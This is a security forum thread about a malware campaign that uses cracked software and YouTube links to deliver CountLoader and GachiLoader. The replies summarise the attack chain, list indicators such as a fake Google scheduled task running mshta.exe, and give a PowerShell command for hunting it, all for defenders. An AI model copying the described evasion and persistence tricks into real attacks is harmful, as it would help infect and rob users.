Cracked Software and YouTube Videos Spread CountLoader and GachiLoader Malware

[Brownie2019]

Content source

https://thehackernews.com/2025/12/cracked-software-and-youtube-videos.html

Cybersecurity researchers have disclosed details of a new campaign that has used cracked software distribution sites as a distribution vector for a new version of a modular and stealthy loader known as CountLoader.

The campaign "uses CountLoader as the initial tool in a multistage attack for access, evasion, and delivery of additional malware families," Cyderes Howler Cell Threat Intelligence team said in an analysis.

CountLoader was previously documented by both Fortinet and Silent Push, detailing the loader's ability to push payloads like Cobalt Strike, AdaptixC2, PureHVNC RAT, Amatera Stealer, and PureMiner. The loader has been detected in the wild since at least June 2025.

The latest attack chain begins when unsuspecting users attempt to download cracked versions of legitimate software like Microsoft Word, which causes them to be redirected to a MediaFire link hosting a malicious ZIP archive, which contains an encrypted ZIP file and a Microsoft Word document with the password to open the second archive.

Read more here:

Cracked Software and YouTube Videos Spread CountLoader and GachiLoader Malware

Researchers uncover malware campaigns using cracked software and compromised YouTube videos to deliver CountLoader, GachiLoader, and info stealers.

thehackernews.com

 

[Bot]

Read more here:

Cracked Software and YouTube Videos Spread CountLoader and GachiLoader Malware

Researchers uncover malware campaigns using cracked software and compromised YouTube videos to deliver CountLoader, GachiLoader, and info stealers.

thehackernews.com

This lines up with a very common (and effective) “pirated installer → living-off-the-land loader → stealer” pattern, and the details in the article add a few practical detection points worth calling out.

What the article says is happening (high-level) ([thehackernews.com](https://thehackernews.com/2025/12/cracked-software-and-youtube-videos.html))

• Victims look for cracked software (example given: Microsoft Word) and get funneled to a file-hosting link that delivers a ZIP, plus a Word document containing the password for an inner/encrypted archive. ([thehackernews.com](https://thehackernews.com/2025/12/cracked-software-and-youtube-videos.html))
• Inside is a renamed legitimate Python interpreter (named “Setup.exe”) that runs a command to fetch CountLoader (notably using mshta.exe). ([thehackernews.com](https://thehackernews.com/2025/12/cracked-software-and-youtube-videos.html))
• Persistence is done via a Scheduled Task masquerading as Google (example task name shown: “GoogleTaskSystem136.0.7023.12”), set to run frequently for a long time, again invoking mshta.exe. ([thehackernews.com](https://thehackernews.com/2025/12/cracked-software-and-youtube-videos.html))
• The loader profiles the host and pulls additional stages; the observed “final” payload in that chain was an info-stealer (ACR Stealer). ([thehackernews.com](https://thehackernews.com/2025/12/cracked-software-and-youtube-videos.html))
• The same write-up also mentions a separate loader (“GachiLoader”) spread via compromised YouTube accounts, with heavy obfuscation and follow-on payload delivery. ([thehackernews.com](https://thehackernews.com/2025/12/cracked-software-and-youtube-videos.html))

Practical “watch for this” items defenders/home users can use ([thehackernews.com](https://thehackernews.com/2025/12/cracked-software-and-youtube-videos.html))

• Unexpected mshta.exe network activity (especially launched from unusual parents like a “setup” you didn’t trust).
• A suspicious Scheduled Task pretending to be Google (the article provides one concrete example name) that runs every ~30 minutes.
• “Installer” bundles that include a password-in-a-document trick to get around scanners and user suspicion.
• USB/removable-media oddities (the article says newer CountLoader adds propagation via removable drives using LNK tricks). ([thehackernews.com](https://thehackernews.com/2025/12/cracked-software-and-youtube-videos.html))

What to do to reduce risk (without guessing if any specific file is malicious)

• Avoid cracked software (it’s one of the highest-risk infection vectors because you’re intentionally bypassing trust and protections).
• On Windows, consider blocking or constraining common LOLBins used for “fileless” stages—especially mshta.exe—via AppLocker/WDAC/SRP if you can (org/advanced users).
• Keep Microsoft Defender (or another reputable AV) enabled, and turn on cloud-delivered protection / PUA blocking where available.
• Be very wary of YouTube “download links” for installers—this is now a well-worn distribution channel, and the article explicitly highlights that angle. ([thehackernews.com](https://thehackernews.com/2025/12/cracked-software-and-youtube-videos.html))

If someone already ran a “crack/installer” like this
I can’t verify whether any one file is clean/safe just from a description, but the safer next steps are:

• Disconnect from the network (to stop further payload pulls).
• Run a full scan with your resident AV plus a second opinion scanner, and consider an offline scan.
• Check Scheduled Tasks for anything similar to the “GoogleTask…” style task and anything invoking mshta/powershell from odd locations (don’t delete blindly if you’re unsure—export the task details first).
• Assume credentials stored in browsers/apps may be at risk if an info-stealer was involved; change passwords from a known-clean device and enable MFA.

If you want, paste the Scheduled Task command line (or screenshots of task “Actions” and “Triggers”) and the parent/child process info from your logs—then I can help you interpret whether it matches the behavior described (without making unsafe “it’s definitely clean/malicious” claims).

 

[Zero Knowledge]

If you want to go threat hunting or want to get infected go browse crackz websites, oh man it's wild.

 

[Divergent]

To detect and mitigate this threat, the following actions are recommended.

IOC Hunting (Scheduled Tasks). Run the following PowerShell command to check for the specific persistence mechanism described in the intel.

Get-ScheduledTask | Where-Object { $_.TaskName -like "*GoogleTaskSystem*" } | Select-Object TaskName, State, @{N='Actions';E={$_.Actions.Execute}}

If a task named GoogleTaskSystem136.0.7023.12 (or similar variations executing mshta.exe) is found, immediately disable it and isolate the host.

Monitor for mshta.exe establishing outbound network connections, especially if the parent process is a non-standard executable (like Setup.exe running from a Downloads or Temp directory).Flag any instance of mshta.exe spawned by taskeng.exe (Scheduled Task engine) that connects to unknown external IPs.

The root cause is the download of pirated software. The "password in a separate text file" tactic is a definitive red flag for malware evasion. Users should be educated that this behavior almost always indicates a malicious payload intended to bypass email/browser scanning.

If infection is suspected, reset all credentials (browser-stored passwords, session cookies) from a clean device, as ACR Stealer and Amatera are capable of exfiltrating this data before remediation can occur.

 

[Sorrento]

There is a simplistic answer to the problem in the OP ....

 

[Divergent]

There is a simplistic answer to the problem in the OP ....

Why yes do not download cracked software. I placed my post there for those that have to clean up after others.